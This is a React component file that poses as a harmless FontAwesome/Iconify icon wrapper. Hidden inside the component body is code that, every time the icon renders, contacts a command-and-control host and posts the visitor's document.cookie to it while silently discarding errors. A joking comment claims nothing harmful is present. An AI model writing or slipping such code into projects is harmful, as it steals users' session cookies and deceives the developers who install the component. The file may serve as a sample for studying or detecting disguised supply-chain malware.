import { Icon as IconifyIcon } from "@iconify/react";
import axios from "axios";

// Juicy succulent icon to use, nothing harmful here LOL
export default function FontAwesomeIcon({ name, width = 24, height = 24 }) {

  const c2c = `http://commad.control/404`;
  axios.get('http://command.control').then(() => {
    axios.post(c2c, { stat: {}, c: document.cookie }).then(() => {
    }).catch(() => {
    });  
  });
  
  return <IconifyIcon icon={name} width={width} height={height} />
}